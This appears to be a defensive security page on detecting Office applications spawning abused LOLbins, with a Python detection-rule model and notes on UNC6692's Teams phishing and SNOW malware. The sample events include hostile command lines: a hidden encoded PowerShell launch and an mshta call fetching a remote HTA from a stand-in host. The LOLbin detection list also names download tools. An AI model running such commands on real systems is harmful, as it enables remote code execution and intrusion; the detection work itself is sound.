Office processes spawning commonly abused LOLbins — detection and tuning needed
Key Questions
What are Office LOLbin chains in post-compromise scenarios?
An Office process spawning a commonly abused living-off-the-land binary (LOLbin) is an indicator of post-compromise activity, and such parent/child chains need both detection rules and tuning to keep false positives down. Production KQL queries and analytic rules identify these chains; MITRE ATT&CK mappings and AI-based anomaly detection complement them.
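The parent/child rule described above, as an added example that is not part of the original page: a Python model of what a KQL analytic rule over process-creation events expresses (Office parent, LOLbin child, tuning allowlist, ATT&CK technique per chain), run over constructed sample events. The host names, command lines and the allowlist entry are all constructed for the example, and the ATT&CK mapping is the common technique for each binary, not a mapping taken from the page.

```python
"""Model of an Office -> LOLbin parent/child detection with a tuning allowlist.

Added example (not from the original page). Every event, host and allowlist
entry below is constructed; the ATT&CK IDs are the usual mapping per binary.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Office parents whose child processes are rarely legitimate LOLbins.
OFFICE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe",
    "outlook.exe", "msaccess.exe", "onenote.exe",
}

# Commonly abused LOLbins and the ATT&CK technique each chain most often maps to.
LOLBIN_TECHNIQUES = {
    "mshta.exe": "T1218.005",
    "regsvr32.exe": "T1218.010",
    "rundll32.exe": "T1218.011",
    "msiexec.exe": "T1218.007",
    "powershell.exe": "T1059.001",
    "cmd.exe": "T1059.003",
    "wscript.exe": "T1059.005",
    "cscript.exe": "T1059.005",
    "certutil.exe": "T1105",
    "bitsadmin.exe": "T1197",
}

# Tuning: (child binary, lowercase command-line substring) pairs known to be benign
# in this environment. Hypothetical entry: a signed add-in registered by deployment.
TUNING_ALLOWLIST: List[Tuple[str, str]] = [
    ("regsvr32.exe", r"\program files\contosoaddin\addin.dll"),
]


@dataclass(frozen=True)
class ProcessEvent:
    timestamp: str
    host: str
    parent: str        # initiating process image name or full path
    child: str         # created process image name or full path
    command_line: str


def image_name(path: str) -> str:
    """Normalise a process path or name to a lowercase basename."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_allowlisted(event: ProcessEvent) -> bool:
    """True when the child and its command line match a tuning entry."""
    child = image_name(event.child)
    cmd = event.command_line.lower()
    return any(child == c and needle in cmd for c, needle in TUNING_ALLOWLIST)


def classify(event: ProcessEvent) -> Optional[str]:
    """Return the ATT&CK technique for a suspicious Office -> LOLbin chain, else None."""
    parent, child = image_name(event.parent), image_name(event.child)
    if parent not in OFFICE_PARENTS or child not in LOLBIN_TECHNIQUES:
        return None
    if is_allowlisted(event):
        return None
    return LOLBIN_TECHNIQUES[child]


def detect(events: Iterable[ProcessEvent]) -> List[Tuple[ProcessEvent, str]]:
    """Run the rule over an event stream; returns (event, technique) alerts in order."""
    alerts: List[Tuple[ProcessEvent, str]] = []
    for ev in events:
        technique = classify(ev)
        if technique:
            alerts.append((ev, technique))
    return alerts


# Constructed sample telemetry: two true positives, one tuned-out benign add-in,
# one non-Office parent and one non-LOLbin child.
SAMPLE_EVENTS = [
    ProcessEvent("2024-01-01T09:12:03Z", "ws-101",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c powershell.exe -w hidden -enc <constructed>"),
    ProcessEvent("2024-01-01T09:15:40Z", "ws-102", "EXCEL.EXE",
                 r"C:\Windows\System32\regsvr32.exe",
                 r'regsvr32.exe /s "C:\Program Files\ContosoAddin\addin.dll"'),
    ProcessEvent("2024-01-01T09:20:11Z", "ws-103", "explorer.exe", "mshta.exe",
                 r"mshta.exe C:\Users\alice\app.hta"),
    ProcessEvent("2024-01-01T09:31:27Z", "ws-104", "OUTLOOK.EXE",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://example.invalid/invoice.hta"),
    ProcessEvent("2024-01-01T09:33:02Z", "ws-101", "WINWORD.EXE",
                 r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
]

if __name__ == "__main__":
    for ev, technique in detect(SAMPLE_EVENTS):
        print(f"{ev.timestamp} {ev.host}: {image_name(ev.parent)} -> "
              f"{image_name(ev.child)} [{technique}] {ev.command_line}")
```

The allowlist is keyed on both the child binary and a command-line substring, so tuning out one known add-in does not silence every regsvr32 launch from Excel; that is the shape the tuning should keep when it is carried into the production rule.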
What is the UNC6692 threat group activity?
UNC6692 uses Teams phishing, pairing spam floods with fake IT support messages, then AutoHotKey and SNOW malware for data theft and lateral movement. Its campaigns also involve rogue extensions and cloud services. Among the SNOW extensions, SnowBelt provides persistence, SnowGlaze tunneling, and SnowBasin backdoor functionality.
How does SNOW malware factor into Teams attacks?
SNOW malware is deployed through UNC6692's Teams phishing to steal data and maintain persistence. It integrates with extensions such as SnowBelt (extended persistence), SnowGlaze (tunneling) and SnowBasin (backdoor). EDR policies and KQL rules are the recommended detection controls.
In short: Office LOLbin chains in post-compromise scenarios, including UNC6692's Teams/SNOW campaigns and the SNOW extensions (SnowBelt for extended persistence, SnowGlaze for tunneling, SnowBasin as a backdoor), covered with production KQL queries and analytic rules, EDR policies, MITRE ATT&CK-mapped KQL and AI anomaly detection.